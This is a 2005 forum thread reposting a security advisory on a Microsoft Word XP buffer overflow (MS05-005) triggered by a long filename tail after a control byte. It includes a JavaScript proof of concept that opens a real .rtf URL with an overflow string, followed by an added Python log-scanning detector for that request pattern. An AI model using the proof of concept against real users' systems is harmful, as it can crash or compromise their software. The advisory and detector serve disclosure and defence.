Forums: Microsoft Office Xp Remote Buffer Overflow Technic - Forums


Microsoft Office Xp Remote Buffer Overflow Technic some details on the vuln

#1 BuzzDee

  • Master Sergeant
  • Group: Specialist
  • Posts: 454
  • Joined: 27-September 03

Posted 14 February 2005 - 05:16 AM



Microsoft Office XP Remote Buffer Overflow Technical Details (MS05-005)    13 Feb. 2005

Summary
A new vulnerability in Microsoft Word XP allows an attacker to launch a buffer overflow attack. This attack can occur when a user opens a Word document using Internet Explorer.
 
Credit:
The information has been provided by Rafel Ivgi.
 
 Details
When a ".doc" file is opened inside Internet Explorer, Microsoft Word XP "takes over" and opens that doc file. The problem appears when sending a doc file request that contains a null byte (parser) at the end of the doc filename (the rtf extension is also vulnerable).

For Example:
http://example.com/myfile.doc is a valid request.
However, the following: http://example.com/myfile.doc%00aaaaaaaaaaaaaaaaaaaaaaa...aa.doc is an invalid request. Such a request will be sent to the server hosting the doc file.

Most servers like IIS and Apache will truncate the characters before the %00 while sending the filename to Internet Explorer. At this stage, Internet Explorer will hand over the string to Microsoft Word XP, which will now receive a long string. This string causes an exploitable buffer overflow, allowing remote code execution.

Proof of Concept Code:
<script>
var mylongstring, myjunk, c;
mylongstring = "";
// the string literal was wrapped across two lines on the page; it is one literal
myjunk = "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb";
// build a long filename tail by repeating the junk string
for (c = 1; c < 5000; c++)
{
  mylongstring = mylongstring + myjunk;
}
// the control byte after ".rtf" triggers the server-side truncation described above
window.open("http://www.hhs.gov/ocr/privacysummary.rtf%0a" + mylongstring);
</script>

Vendor Status:
Microsoft was notified on July 13, 2004.
Microsoft released an advisory and patches to this vulnerability. For further details please refer to: Vulnerability in Microsoft Office XP could allow Remote Code Execution (MS05-005)


taken from hxxp://www.securiteam.com

edit:

hmm, dunno if this is the BOF we want, but I can crash winword.
have a look:

Attached file: shot.JPG (168.33K)


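The mechanism the advisory describes is a request shape, not a payload: an Office filename, a control byte, and a long run of bytes after it that the server discards and the browser keeps. That shape is visible in ordinary web server logs, so a defender can look for it directly. The following is an added example, not code from the advisory, SecuriTeam, or the poster. It assumes Apache/IIS-style combined log lines, treats CR and LF the same way as the NUL byte the advisory names (an assumption, since the page only says servers truncate at %00 and its proof of concept uses %0a), and uses an arbitrary tail-length threshold of 256 bytes. The sample log lines are constructed.

```python
import re
from urllib.parse import unquote_to_bytes, urlsplit

# Extensions the advisory says Internet Explorer hands to Word XP.
OFFICE_EXTS = (b".doc", b".rtf")
# Bytes assumed to make the server truncate the filename it serves (NUL, LF, CR).
TRUNCATING_BYTES = {0x00, 0x0A, 0x0D}
# Assumed threshold: a tail this long after a control byte is never a real filename.
LONG_TAIL = 256

# Request target inside an Apache/IIS-style combined log line (assumed format).
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def analyse_request_path(raw_target: str) -> dict:
    """Percent-decode a request target and report whether it has the shape the
    advisory describes: an Office filename, a truncating control byte, and a
    long run of bytes after it."""
    path = unquote_to_bytes(urlsplit(raw_target).path)
    cut = next((i for i, b in enumerate(path) if b in TRUNCATING_BYTES), None)
    if cut is None:
        return {"suspicious": False, "cut_at": None, "tail_len": 0,
                "ext_before": path.lower().endswith(OFFICE_EXTS),
                "ext_after": False}
    head, tail = path[:cut], path[cut + 1:]
    ext_before = head.lower().endswith(OFFICE_EXTS)   # what the server sees
    ext_after = tail.lower().endswith(OFFICE_EXTS)    # what the browser sees
    return {
        "suspicious": (ext_before or ext_after) and len(tail) >= LONG_TAIL,
        "cut_at": cut,
        "tail_len": len(tail),
        "ext_before": ext_before,
        "ext_after": ext_after,
    }


def scan_log(lines):
    """Return (target-prefix, verdict) for every log line whose request matches."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        verdict = analyse_request_path(m.group("target"))
        if verdict["suspicious"]:
            hits.append((m.group("target")[:40], verdict))
    return hits


# Constructed sample log lines (not from the page): one benign download, one
# NUL-truncated request with a long tail, one LF-truncated request shaped like
# the advisory's proof of concept, and one short NUL tail that must not fire.
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Feb/2005:05:16:00 +0000] "GET /docs/report.doc HTTP/1.1" 200 40960',
    '10.0.0.9 - - [14/Feb/2005:05:17:12 +0000] "GET /docs/report.doc%00'
    + "a" * 600 + '.doc HTTP/1.1" 200 40960',
    '10.0.0.9 - - [14/Feb/2005:05:18:30 +0000] "GET /ocr/privacysummary.rtf%0a'
    + "b" * 300 + ' HTTP/1.1" 200 12288',
    '10.0.0.7 - - [14/Feb/2005:05:19:01 +0000] "GET /docs/report.doc%00.doc HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for target, verdict in scan_log(SAMPLE_LOG):
        print(f"{target}... cut_at={verdict['cut_at']} tail_len={verdict['tail_len']}")
```

Run against the constructed sample, only the two long-tailed requests are reported; the short `%00.doc` case is kept out by the length threshold so that the rule does not fire on every stray encoded NUL. The check works on the decoded bytes rather than the raw string so that `%00`, `%0a` and any mixed-case encodings are handled alike, and it records both the extension the server saw and the one the client saw, which is the detail that distinguishes this truncation pattern from an ordinary malformed URL.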

#2 tibbar

  • Master Sergeant
  • Group: Members
  • Posts: 1,423
  • Joined: 14-October 03

Posted 14 February 2005 - 12:33 PM

that's the one indeed...
If you want to read more about my security research, visit Tibbar.org
